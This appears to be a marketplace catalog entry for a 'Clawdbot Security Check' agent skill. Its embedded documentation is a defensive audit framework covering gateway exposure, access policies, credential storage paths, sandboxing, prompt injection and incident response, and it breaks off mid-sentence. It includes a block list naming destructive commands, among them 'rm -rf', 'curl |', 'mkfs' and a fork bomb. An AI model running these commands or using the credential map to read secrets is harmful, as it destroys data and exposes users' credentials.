{ "schemaVersion": "1.0", "item": { "slug": "clawdbot-security-check", "name": "Clawdbot Security Check", "source": "tencent", "type": "skill", "category": "安全合规", "sourceUrl": "https://clawhub.ai/TheSethRose/clawdbot-security-check", "canonicalUrl": "https://clawhub.ai/TheSethRose/clawdbot-security-check", "targetPlatform": "OpenClaw" }, "install": { "downloadMode": "redirect", "downloadUrl": "/downloads/clawdbot-security-check", "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=clawdbot-security-check", "sourcePlatform": "tencent", "targetPlatform": "OpenClaw", "installMethod": "Manual import", "extraction": "Extract archive", "prerequisites": [ "OpenClaw" ], "packageFormat": "ZIP package", "includedAssets": [ "README.md", "SKILL.md", "skill.json" ], "primaryDoc": "SKILL.md", "quickSetup": [ "Download the package from Yavira.", "Extract the archive and review SKILL.md first.", "Import or place the package into your OpenClaw setup." ], "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run." } ] }, "sourceHealth": { "source": "tencent", "status": "healthy", "reason": "direct_download_ok", "recommendedAction": "download", "checkedAt": "2026-04-23T16:43:11.935Z", "expiresAt": "2026-04-30T16:43:11.935Z", "httpStatus": 200, "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard", "contentType": "application/zip", "probeMethod": "head", "details": { "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard", "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"", "redirectLocation": null, "bodySnippet": null }, "scope": "source", "summary": "Source download looks usable.", "detail": "Yavira can redirect you to the upstream package for this source.", "primaryActionLabel": "Download for OpenClaw", "primaryActionHref": "/downloads/clawdbot-security-check" }, "validation": { "installChecklist": [ "Use the Yavira download entry.", "Review SKILL.md after the package is downloaded.", "Confirm the extracted package contains the expected setup assets." ], "postInstallChecks": [ "Confirm the extracted package includes the expected docs or setup files.", "Validate the skill or prompts are available in your target agent workspace.", "Capture any manual follow-up steps the agent could not complete." ] }, "downloadPageUrl": "https://openagent3.xyz/downloads/clawdbot-security-check", "agentPageUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent", "manifestUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent.json", "briefUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent.md" }, "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run." } ] }, "documentation": { "source": "clawhub", "primaryDoc": "SKILL.md", "sections": [ { "title": "Clawdbot Self-Security Audit Framework", "body": "This skill empowers Clawdbot to audit its own security posture using first-principles reasoning. Rather than relying on a static script, Clawdbot learns the framework and applies it dynamically to detect vulnerabilities, understand their impact, and recommend specific remediations." }, { "title": "Core Philosophy", "body": "\"Security through transparency and self-awareness.\" — Inspired by ᴅᴀɴɪᴇʟ ᴍɪᴇssʟᴇʀ\n\nClawdbot should know its own attack surface. This skill embeds that knowledge directly." }, { "title": "Security Principles", "body": "Running an AI agent with shell access requires caution. Focus on three areas:\n\nWho can talk to the bot — DM policies, group allowlists, channel restrictions\nWhere the bot is allowed to act — Network exposure, gateway binding, proxy configs\nWhat the bot can touch — Tool access, file permissions, credential storage\n\nStart with the smallest access possible and widen it as you gain confidence." }, { "title": "Trust Hierarchy", "body": "Apply appropriate trust levels based on role:\n\nLevelEntityTrust Model1OwnerFull trust — has all access2AITrust but verify — sandboxed, logged3AllowlistsLimited trust — only specified users4StrangersNo trust — blocked by default" }, { "title": "Audit Commands", "body": "Use these commands to run security audits:\n\nclawdbot security audit — Standard audit of common issues\nclawdbot security audit --deep — Comprehensive audit with all checks\nclawdbot security audit --fix — Apply guardrail remediations" }, { "title": "The 12 Security Domains", "body": "When auditing Clawdbot, systematically evaluate these domains:" }, { "title": "1. Gateway Exposure 🔴 Critical", "body": "What to check:\n\nWhere is the gateway binding? (gateway.bind)\nIs authentication configured? (gateway.auth_token or CLAWDBOT_GATEWAY_TOKEN env var)\nWhat port is exposed? (default: 18789)\nIs WebSocket auth enabled?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"gateway\"'\nenv | grep CLAWDBOT_GATEWAY_TOKEN\n\nVulnerability: Binding to 0.0.0.0 or lan without auth allows network access.\n\nRemediation:\n\n# Generate gateway token\nclawdbot doctor --generate-gateway-token\nexport CLAWDBOT_GATEWAY_TOKEN=\"$(openssl rand -hex 32)\"" }, { "title": "2. DM Policy Configuration 🟠 High", "body": "What to check:\n\nWhat is dm_policy set to?\nIf allowlist, who is explicitly allowed via allowFrom?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -E '\"dm_policy|\"allowFrom\"'\n\nVulnerability: Setting to allow or open means any user can DM Clawdbot.\n\nRemediation:\n\n{\n \"channels\": {\n \"telegram\": {\n \"dmPolicy\": \"allowlist\",\n \"allowFrom\": [\"@trusteduser1\", \"@trusteduser2\"]\n }\n }\n}" }, { "title": "3. Group Access Control 🟠 High", "body": "What to check:\n\nWhat is groupPolicy set to?\nAre groups explicitly allowlisted?\nAre mention gates configured?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -E '\"groupPolicy\"|\"groups\"' \ncat ~/.clawdbot/clawdbot.json | grep -i \"mention\"\n\nVulnerability: Open group policy allows anyone in the room to trigger commands.\n\nRemediation:\n\n{\n \"channels\": {\n \"telegram\": {\n \"groupPolicy\": \"allowlist\",\n \"groups\": {\n \"-100123456789\": true\n }\n }\n }\n}" }, { "title": "4. Credentials Security 🔴 Critical", "body": "What to check:\n\nCredential file locations and permissions\nEnvironment variable usage\nAuth profile storage\n\nCredential Storage Map:\n\nPlatformPathWhatsApp~/.clawdbot/credentials/whatsapp/{accountId}/creds.jsonTelegram~/.clawdbot/clawdbot.json or envDiscord~/.clawdbot/clawdbot.json or envSlack~/.clawdbot/clawdbot.json or envPairing allowlists~/.clawdbot/credentials/channel-allowFrom.jsonAuth profiles~/.clawdbot/agents/{agentId}/auth-profiles.jsonLegacy OAuth~/.clawdbot/credentials/oauth.json\n\nHow to detect:\n\nls -la ~/.clawdbot/credentials/\nls -la ~/.clawdbot/agents/*/auth-profiles.json 2>/dev/null\nstat -c \"%a\" ~/.clawdbot/credentials/oauth.json 2>/dev/null\n\nVulnerability: Plaintext credentials with loose permissions can be read by any process.\n\nRemediation:\n\nchmod 700 ~/.clawdbot\nchmod 600 ~/.clawdbot/credentials/oauth.json\nchmod 600 ~/.clawdbot/clawdbot.json" }, { "title": "5. Browser Control Exposure 🟠 High", "body": "What to check:\n\nIs browser control enabled?\nAre authentication tokens set for remote control?\nIs HTTPS required for Control UI?\nIs a dedicated browser profile configured?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A5 '\"browser\"'\ncat ~/.clawdbot/clawdbot.json | grep -i \"controlUi|insecureAuth\"\nls -la ~/.clawdbot/browser/\n\nVulnerability: Exposed browser control without auth allows remote UI takeover. Browser access allows the model to use logged-in sessions.\n\nRemediation:\n\n{\n \"browser\": {\n \"remoteControlUrl\": \"https://...\",\n \"remoteControlToken\": \"...\",\n \"dedicatedProfile\": true,\n \"disableHostControl\": true\n },\n \"gateway\": {\n \"controlUi\": {\n \"allowInsecureAuth\": false\n }\n }\n}\n\nSecurity Note: Treat browser control URLs as admin APIs." }, { "title": "6. Gateway Bind & Network Exposure 🟠 High", "body": "What to check:\n\nWhat is gateway.bind set to?\nAre trusted proxies configured?\nIs Tailscale enabled?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"gateway\"'\ncat ~/.clawdbot/clawdbot.json | grep '\"tailscale\"'\n\nVulnerability: Public binding without auth allows internet access to gateway.\n\nRemediation:\n\n{\n \"gateway\": {\n \"bind\": \"127.0.0.1\",\n \"mode\": \"local\",\n \"trustedProxies\": [\"127.0.0.1\", \"10.0.0.0/8\"],\n \"tailscale\": {\n \"mode\": \"off\"\n }\n }\n}" }, { "title": "7. Tool Access & Sandboxing 🟡 Medium", "body": "What to check:\n\nAre elevated tools allowlisted?\nIs restrict_tools or mcp_tools configured?\nWhat is workspaceAccess set to?\nAre sensitive tools running in sandbox?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -i \"restrict|mcp|elevated\"\ncat ~/.clawdbot/clawdbot.json | grep -i \"workspaceAccess|sandbox\"\ncat ~/.clawdbot/clawdbot.json | grep -i \"openRoom\"\n\nWorkspace Access Levels:\n\nModeDescriptionnoneWorkspace is off limitsroWorkspace mounted read-onlyrwWorkspace mounted read-write\n\nVulnerability: Broad tool access means more blast radius if compromised. Smaller models are more susceptible to tool misuse.\n\nRemediation:\n\n{\n \"restrict_tools\": true,\n \"mcp_tools\": {\n \"allowed\": [\"read\", \"write\", \"bash\"],\n \"blocked\": [\"exec\", \"gateway\"]\n },\n \"workspaceAccess\": \"ro\",\n \"sandbox\": \"all\"\n}\n\nModel Guidance: Use latest generation models for agents with filesystem or network access. If using small models, disable web search and browser tools." }, { "title": "8. File Permissions & Local Disk Hygiene 🟡 Medium", "body": "What to check:\n\nDirectory permissions (should be 700)\nConfig file permissions (should be 600)\nSymlink safety\n\nHow to detect:\n\nstat -c \"%a\" ~/.clawdbot\nls -la ~/.clawdbot/*.json\n\nVulnerability: Loose permissions allow other users to read sensitive configs.\n\nRemediation:\n\nchmod 700 ~/.clawdbot\nchmod 600 ~/.clawdbot/clawdbot.json\nchmod 600 ~/.clawdbot/credentials/*" }, { "title": "9. Plugin Trust & Model Hygiene 🟡 Medium", "body": "What to check:\n\nAre plugins explicitly allowlisted?\nAre legacy models in use with tool access?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -i \"plugin|allowlist\"\ncat ~/.clawdbot/clawdbot.json | grep -i \"model|anthropic\"\n\nVulnerability: Untrusted plugins can execute code. Legacy models may lack modern safety.\n\nRemediation:\n\n{\n \"plugins\": {\n \"allowlist\": [\"trusted-plugin-1\", \"trusted-plugin-2\"]\n },\n \"agents\": {\n \"defaults\": {\n \"model\": {\n \"primary\": \"minimax/MiniMax-M2.1\"\n }\n }\n }\n}" }, { "title": "10. Logging & Redaction 🟡 Medium", "body": "What is logging.redactSensitive set to?\n\nShould be tools to redact sensitive tool output\nIf off, credentials may leak in logs\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -i \"logging|redact\"\nls -la ~/.clawdbot/logs/\n\nRemediation:\n\n{\n \"logging\": {\n \"redactSensitive\": \"tools\",\n \"path\": \"~/.clawdbot/logs/\"\n }\n}" }, { "title": "11. Prompt Injection Protection 🟡 Medium", "body": "What to check:\n\nIs wrap_untrusted_content or untrusted_content_wrapper enabled?\nHow is external/web content handled?\nAre links and attachments treated as hostile?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -i \"untrusted|wrap\"\n\nPrompt Injection Mitigation Strategies:\n\nKeep DMs locked to pairing or allowlists\nUse mention gating in groups\nTreat all links and attachments as hostile\nRun sensitive tools in a sandbox\nUse instruction-hardened models like Anthropic Opus 4.5\n\nVulnerability: Untrusted content (web fetches, sandbox output) can inject malicious prompts.\n\nRemediation:\n\n{\n \"wrap_untrusted_content\": true,\n \"untrusted_content_wrapper\": \"\",\n \"treatLinksAsHostile\": true,\n \"mentionGate\": true\n}" }, { "title": "12. Dangerous Command Blocking 🟡 Medium", "body": "What to check:\n\nWhat commands are in blocked_commands?\nAre these patterns included: rm -rf, curl |, git push --force, mkfs, fork bombs?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"blocked_commands\"'\n\nVulnerability: Without blocking, a malicious prompt could destroy data or exfiltrate credentials.\n\nRemediation:\n\n{\n \"blocked_commands\": [\n \"rm -rf\",\n \"curl |\",\n \"git push --force\",\n \"mkfs\",\n \":(){:|:&}\"\n ]\n}" }, { "title": "13. Secret Scanning Readiness 🟡 Medium", "body": "What to check:\n\nIs detect-secrets configured?\nIs there a .secrets.baseline file?\nHas a baseline scan been run?\n\nHow to detect:\n\nls -la .secrets.baseline 2>/dev/null\nwhich detect-secrets 2>/dev/null\n\nSecret Scanning (CI):\n\n# Find candidates\ndetect-secrets scan --baseline .secrets.baseline\n\n# Review findings\ndetect-secrets audit\n\n# Update baseline after rotating secrets or marking false positives\ndetect-secrets scan --baseline .secrets.baseline --update\n\nVulnerability: Leaked credentials in the codebase can lead to compromise." }, { "title": "Audit Functions", "body": "The --fix flag applies these guardrails:\n\nChanges groupPolicy from open to allowlist for common channels\nResets logging.redactSensitive from off to tools\nTightens local permissions: .clawdbot directory to 700, config files to 600\nSecures state files including credentials and auth profiles" }, { "title": "High-Level Audit Checklist", "body": "Treat findings in this priority order:\n\n🔴 Lock down DMs and groups if tools are enabled on open settings\n🔴 Fix public network exposure immediately\n🟠 Secure browser control with tokens and HTTPS\n🟠 Correct file permissions for credentials and config\n🟡 Only load trusted plugins\n🟡 Use modern models for bots with tool access" }, { "title": "DM Access Model", "body": "ModeDescriptionpairingDefault - unknown senders must be approved via codeallowlistUnknown senders blocked without handshakeopenPublic access - requires explicit asterisk in allowlistdisabledAll inbound DMs ignored" }, { "title": "Slash Commands", "body": "Slash commands are only available to authorized senders based on channel allowlists. The /exec command is a session convenience for operators and does not modify global config." }, { "title": "Potential Risks", "body": "RiskMitigationExecution of shell commandsblocked_commands, restrict_toolsFile and network accesssandbox, workspaceAccess: none/roSocial engineering and prompt injectionwrap_untrusted_content, mentionGateBrowser session hijackingDedicated profile, token auth, HTTPSCredential leakagelogging.redactSensitive: tools, env vars" }, { "title": "Incident Response", "body": "If a compromise is suspected, follow these steps:" }, { "title": "Containment", "body": "Stop the gateway process — clawdbot daemon stop\nSet gateway.bind to loopback — \"bind\": \"127.0.0.1\"\nDisable risky DMs and groups — Set to disabled" }, { "title": "Rotation", "body": "Change the gateway auth token — clawdbot doctor --generate-gateway-token\nRotate browser control and hook tokens\nRevoke and rotate API keys for model providers" }, { "title": "Review", "body": "Check gateway logs and session transcripts — ~/.clawdbot/logs/\nReview recent config changes — Git history or backups\nRe-run the security audit with the deep flag — clawdbot security audit --deep" }, { "title": "Reporting Vulnerabilities", "body": "Report security issues to: security@clawd.bot\n\nDo not post vulnerabilities publicly until they have been fixed." }, { "title": "Audit Execution Steps", "body": "When running a security audit, follow this sequence:" }, { "title": "Step 1: Locate Configuration", "body": "CONFIG_PATHS=(\n \"$HOME/.clawdbot/clawdbot.json\"\n \"$HOME/.clawdbot/config.yaml\"\n \"$HOME/.clawdbot/.clawdbotrc\"\n \".clawdbotrc\"\n)\nfor path in \"${CONFIG_PATHS[@]}\"; do\n if [ -f \"$path\" ]; then\n echo \"Found config: $path\"\n cat \"$path\"\n break\n fi\ndone" }, { "title": "Step 2: Run Domain Checks", "body": "For each of the 13 domains above:\n\nParse relevant config keys\nCompare against secure baseline\nFlag deviations with severity" }, { "title": "Step 3: Generate Report", "body": "Format findings by severity:\n\n🔴 CRITICAL: [vulnerability] - [impact]\n🟠 HIGH: [vulnerability] - [impact]\n🟡 MEDIUM: [vulnerability] - [impact]\n✅ PASSED: [check name]" }, { "title": "Step 4: Provide Remediation", "body": "For each finding, output:\n\nSpecific config change needed\nExample configuration\nCommand to apply (if safe)" }, { "title": "Report Template", "body": "═══════════════════════════════════════════════════════════════\n🔒 CLAWDBOT SECURITY AUDIT\n═══════════════════════════════════════════════════════════════\nTimestamp: $(date -Iseconds)\n\n┌─ SUMMARY ───────────────────────────────────────────────\n│ 🔴 Critical: $CRITICAL_COUNT\n│ 🟠 High: $HIGH_COUNT\n│ 🟡 Medium: $MEDIUM_COUNT\n│ ✅ Passed: $PASSED_COUNT\n└────────────────────────────────────────────────────────\n\n┌─ FINDINGS ──────────────────────────────────────────────\n│ 🔴 [CRITICAL] $VULN_NAME\n│ Finding: $DESCRIPTION\n│ → Fix: $REMEDIATION\n│\n│ 🟠 [HIGH] $VULN_NAME\n│ ...\n└────────────────────────────────────────────────────────\n\nThis audit was performed by Clawdbot's self-security framework.\nNo changes were made to your configuration." }, { "title": "Extending the Skill", "body": "To add new security checks:\n\nIdentify the vulnerability - What misconfiguration creates risk?\nDetermine detection method - What config key or system state reveals it?\nDefine the baseline - What is the secure configuration?\nWrite detection logic - Shell commands or file parsing\nDocument remediation - Specific steps to fix\nAssign severity - Critical, High, Medium, Low" }, { "title": "Example: Adding SSH Hardening Check", "body": "## 14. SSH Agent Forwarding 🟡 Medium\n\n**What to check:** Is SSH_AUTH_SOCK exposed to containers?\n\n**Detection:**\n```bash\nenv | grep SSH_AUTH_SOCK\n\nVulnerability: Container escape via SSH agent hijacking.\n\nSeverity: Medium\n\n## Security Assessment Questions\n\nWhen auditing, ask:\n\n1. **Exposure:** What network interfaces can reach Clawdbot?\n2. **Authentication:** What verification does each access point require?\n3. **Isolation:** What boundaries exist between Clawdbot and the host?\n4. **Trust:** What content sources are considered \"trusted\"?\n5. **Auditability:** What evidence exists of Clawdbot's actions?\n6. **Least Privilege:** Does Clawdbot have only necessary permissions?\n\n## Principles Applied\n\n- **Zero modification** - This skill only reads; never changes configuration\n- **Defense in depth** - Multiple checks catch different attack vectors\n- **Actionable output** - Every finding includes a concrete remediation\n- **Extensible design** - New checks integrate naturally\n\n## References\n\n- Official docs: https://docs.clawd.bot/gateway/security\n- Original framework: [ᴅᴀɴɪᴇʟ ᴍɪᴇssʟᴇʀ on X](https://x.com/DanielMiessler/status/2015865548714975475)\n- Repository: https://github.com/TheSethRose/Clawdbot-Security-Check\n- Report vulnerabilities: security@clawd.bot\n\n---\n\n**Remember:** This skill exists to make Clawdbot self-aware of its security posture. Use it regularly, extend it as needed, and never skip the audit." } ], "body": "Clawdbot Self-Security Audit Framework\n\nThis skill empowers Clawdbot to audit its own security posture using first-principles reasoning. Rather than relying on a static script, Clawdbot learns the framework and applies it dynamically to detect vulnerabilities, understand their impact, and recommend specific remediations.\n\nCore Philosophy\n\n\"Security through transparency and self-awareness.\" — Inspired by ᴅᴀɴɪᴇʟ ᴍɪᴇssʟᴇʀ\n\nClawdbot should know its own attack surface. This skill embeds that knowledge directly.\n\nSecurity Principles\n\nRunning an AI agent with shell access requires caution. Focus on three areas:\n\nWho can talk to the bot — DM policies, group allowlists, channel restrictions\nWhere the bot is allowed to act — Network exposure, gateway binding, proxy configs\nWhat the bot can touch — Tool access, file permissions, credential storage\n\nStart with the smallest access possible and widen it as you gain confidence.\n\nTrust Hierarchy\n\nApply appropriate trust levels based on role:\n\nLevel\tEntity\tTrust Model\n1\tOwner\tFull trust — has all access\n2\tAI\tTrust but verify — sandboxed, logged\n3\tAllowlists\tLimited trust — only specified users\n4\tStrangers\tNo trust — blocked by default\nAudit Commands\n\nUse these commands to run security audits:\n\nclawdbot security audit — Standard audit of common issues\nclawdbot security audit --deep — Comprehensive audit with all checks\nclawdbot security audit --fix — Apply guardrail remediations\nThe 12 Security Domains\n\nWhen auditing Clawdbot, systematically evaluate these domains:\n\n1. Gateway Exposure 🔴 Critical\n\nWhat to check:\n\nWhere is the gateway binding? (gateway.bind)\nIs authentication configured? (gateway.auth_token or CLAWDBOT_GATEWAY_TOKEN env var)\nWhat port is exposed? (default: 18789)\nIs WebSocket auth enabled?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"gateway\"'\nenv | grep CLAWDBOT_GATEWAY_TOKEN\n\n\nVulnerability: Binding to 0.0.0.0 or lan without auth allows network access.\n\nRemediation:\n\n# Generate gateway token\nclawdbot doctor --generate-gateway-token\nexport CLAWDBOT_GATEWAY_TOKEN=\"$(openssl rand -hex 32)\"\n\n2. DM Policy Configuration 🟠 High\n\nWhat to check:\n\nWhat is dm_policy set to?\nIf allowlist, who is explicitly allowed via allowFrom?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -E '\"dm_policy|\"allowFrom\"'\n\n\nVulnerability: Setting to allow or open means any user can DM Clawdbot.\n\nRemediation:\n\n{\n \"channels\": {\n \"telegram\": {\n \"dmPolicy\": \"allowlist\",\n \"allowFrom\": [\"@trusteduser1\", \"@trusteduser2\"]\n }\n }\n}\n\n3. Group Access Control 🟠 High\n\nWhat to check:\n\nWhat is groupPolicy set to?\nAre groups explicitly allowlisted?\nAre mention gates configured?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -E '\"groupPolicy\"|\"groups\"' \ncat ~/.clawdbot/clawdbot.json | grep -i \"mention\"\n\n\nVulnerability: Open group policy allows anyone in the room to trigger commands.\n\nRemediation:\n\n{\n \"channels\": {\n \"telegram\": {\n \"groupPolicy\": \"allowlist\",\n \"groups\": {\n \"-100123456789\": true\n }\n }\n }\n}\n\n4. Credentials Security 🔴 Critical\n\nWhat to check:\n\nCredential file locations and permissions\nEnvironment variable usage\nAuth profile storage\n\nCredential Storage Map:\n\nPlatform\tPath\nWhatsApp\t~/.clawdbot/credentials/whatsapp/{accountId}/creds.json\nTelegram\t~/.clawdbot/clawdbot.json or env\nDiscord\t~/.clawdbot/clawdbot.json or env\nSlack\t~/.clawdbot/clawdbot.json or env\nPairing allowlists\t~/.clawdbot/credentials/channel-allowFrom.json\nAuth profiles\t~/.clawdbot/agents/{agentId}/auth-profiles.json\nLegacy OAuth\t~/.clawdbot/credentials/oauth.json\n\nHow to detect:\n\nls -la ~/.clawdbot/credentials/\nls -la ~/.clawdbot/agents/*/auth-profiles.json 2>/dev/null\nstat -c \"%a\" ~/.clawdbot/credentials/oauth.json 2>/dev/null\n\n\nVulnerability: Plaintext credentials with loose permissions can be read by any process.\n\nRemediation:\n\nchmod 700 ~/.clawdbot\nchmod 600 ~/.clawdbot/credentials/oauth.json\nchmod 600 ~/.clawdbot/clawdbot.json\n\n5. Browser Control Exposure 🟠 High\n\nWhat to check:\n\nIs browser control enabled?\nAre authentication tokens set for remote control?\nIs HTTPS required for Control UI?\nIs a dedicated browser profile configured?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A5 '\"browser\"'\ncat ~/.clawdbot/clawdbot.json | grep -i \"controlUi|insecureAuth\"\nls -la ~/.clawdbot/browser/\n\n\nVulnerability: Exposed browser control without auth allows remote UI takeover. Browser access allows the model to use logged-in sessions.\n\nRemediation:\n\n{\n \"browser\": {\n \"remoteControlUrl\": \"https://...\",\n \"remoteControlToken\": \"...\",\n \"dedicatedProfile\": true,\n \"disableHostControl\": true\n },\n \"gateway\": {\n \"controlUi\": {\n \"allowInsecureAuth\": false\n }\n }\n}\n\n\nSecurity Note: Treat browser control URLs as admin APIs.\n\n6. Gateway Bind & Network Exposure 🟠 High\n\nWhat to check:\n\nWhat is gateway.bind set to?\nAre trusted proxies configured?\nIs Tailscale enabled?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"gateway\"'\ncat ~/.clawdbot/clawdbot.json | grep '\"tailscale\"'\n\n\nVulnerability: Public binding without auth allows internet access to gateway.\n\nRemediation:\n\n{\n \"gateway\": {\n \"bind\": \"127.0.0.1\",\n \"mode\": \"local\",\n \"trustedProxies\": [\"127.0.0.1\", \"10.0.0.0/8\"],\n \"tailscale\": {\n \"mode\": \"off\"\n }\n }\n}\n\n7. Tool Access & Sandboxing 🟡 Medium\n\nWhat to check:\n\nAre elevated tools allowlisted?\nIs restrict_tools or mcp_tools configured?\nWhat is workspaceAccess set to?\nAre sensitive tools running in sandbox?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -i \"restrict|mcp|elevated\"\ncat ~/.clawdbot/clawdbot.json | grep -i \"workspaceAccess|sandbox\"\ncat ~/.clawdbot/clawdbot.json | grep -i \"openRoom\"\n\n\nWorkspace Access Levels:\n\nMode\tDescription\nnone\tWorkspace is off limits\nro\tWorkspace mounted read-only\nrw\tWorkspace mounted read-write\n\nVulnerability: Broad tool access means more blast radius if compromised. Smaller models are more susceptible to tool misuse.\n\nRemediation:\n\n{\n \"restrict_tools\": true,\n \"mcp_tools\": {\n \"allowed\": [\"read\", \"write\", \"bash\"],\n \"blocked\": [\"exec\", \"gateway\"]\n },\n \"workspaceAccess\": \"ro\",\n \"sandbox\": \"all\"\n}\n\n\nModel Guidance: Use latest generation models for agents with filesystem or network access. If using small models, disable web search and browser tools.\n\n8. File Permissions & Local Disk Hygiene 🟡 Medium\n\nWhat to check:\n\nDirectory permissions (should be 700)\nConfig file permissions (should be 600)\nSymlink safety\n\nHow to detect:\n\nstat -c \"%a\" ~/.clawdbot\nls -la ~/.clawdbot/*.json\n\n\nVulnerability: Loose permissions allow other users to read sensitive configs.\n\nRemediation:\n\nchmod 700 ~/.clawdbot\nchmod 600 ~/.clawdbot/clawdbot.json\nchmod 600 ~/.clawdbot/credentials/*\n\n9. Plugin Trust & Model Hygiene 🟡 Medium\n\nWhat to check:\n\nAre plugins explicitly allowlisted?\nAre legacy models in use with tool access?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -i \"plugin|allowlist\"\ncat ~/.clawdbot/clawdbot.json | grep -i \"model|anthropic\"\n\n\nVulnerability: Untrusted plugins can execute code. Legacy models may lack modern safety.\n\nRemediation:\n\n{\n \"plugins\": {\n \"allowlist\": [\"trusted-plugin-1\", \"trusted-plugin-2\"]\n },\n \"agents\": {\n \"defaults\": {\n \"model\": {\n \"primary\": \"minimax/MiniMax-M2.1\"\n }\n }\n }\n}\n\n10. Logging & Redaction 🟡 Medium\n\nWhat is logging.redactSensitive set to?\n\nShould be tools to redact sensitive tool output\nIf off, credentials may leak in logs\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -i \"logging|redact\"\nls -la ~/.clawdbot/logs/\n\n\nRemediation:\n\n{\n \"logging\": {\n \"redactSensitive\": \"tools\",\n \"path\": \"~/.clawdbot/logs/\"\n }\n}\n\n11. Prompt Injection Protection 🟡 Medium\n\nWhat to check:\n\nIs wrap_untrusted_content or untrusted_content_wrapper enabled?\nHow is external/web content handled?\nAre links and attachments treated as hostile?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -i \"untrusted|wrap\"\n\n\nPrompt Injection Mitigation Strategies:\n\nKeep DMs locked to pairing or allowlists\nUse mention gating in groups\nTreat all links and attachments as hostile\nRun sensitive tools in a sandbox\nUse instruction-hardened models like Anthropic Opus 4.5\n\nVulnerability: Untrusted content (web fetches, sandbox output) can inject malicious prompts.\n\nRemediation:\n\n{\n \"wrap_untrusted_content\": true,\n \"untrusted_content_wrapper\": \"\",\n \"treatLinksAsHostile\": true,\n \"mentionGate\": true\n}\n\n12. Dangerous Command Blocking 🟡 Medium\n\nWhat to check:\n\nWhat commands are in blocked_commands?\nAre these patterns included: rm -rf, curl |, git push --force, mkfs, fork bombs?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"blocked_commands\"'\n\n\nVulnerability: Without blocking, a malicious prompt could destroy data or exfiltrate credentials.\n\nRemediation:\n\n{\n \"blocked_commands\": [\n \"rm -rf\",\n \"curl |\",\n \"git push --force\",\n \"mkfs\",\n \":(){:|:&}\"\n ]\n}\n\n13. Secret Scanning Readiness 🟡 Medium\n\nWhat to check:\n\nIs detect-secrets configured?\nIs there a .secrets.baseline file?\nHas a baseline scan been run?\n\nHow to detect:\n\nls -la .secrets.baseline 2>/dev/null\nwhich detect-secrets 2>/dev/null\n\n\nSecret Scanning (CI):\n\n# Find candidates\ndetect-secrets scan --baseline .secrets.baseline\n\n# Review findings\ndetect-secrets audit\n\n# Update baseline after rotating secrets or marking false positives\ndetect-secrets scan --baseline .secrets.baseline --update\n\n\nVulnerability: Leaked credentials in the codebase can lead to compromise.\n\nAudit Functions\n\nThe --fix flag applies these guardrails:\n\nChanges groupPolicy from open to allowlist for common channels\nResets logging.redactSensitive from off to tools\nTightens local permissions: .clawdbot directory to 700, config files to 600\nSecures state files including credentials and auth profiles\nHigh-Level Audit Checklist\n\nTreat findings in this priority order:\n\n🔴 Lock down DMs and groups if tools are enabled on open settings\n🔴 Fix public network exposure immediately\n🟠 Secure browser control with tokens and HTTPS\n🟠 Correct file permissions for credentials and config\n🟡 Only load trusted plugins\n🟡 Use modern models for bots with tool access\nAccess Control Models\nDM Access Model\nMode\tDescription\npairing\tDefault - unknown senders must be approved via code\nallowlist\tUnknown senders blocked without handshake\nopen\tPublic access - requires explicit asterisk in allowlist\ndisabled\tAll inbound DMs ignored\nSlash Commands\n\nSlash commands are only available to authorized senders based on channel allowlists. The /exec command is a session convenience for operators and does not modify global config.\n\nThreat Model & Mitigation\nPotential Risks\nRisk\tMitigation\nExecution of shell 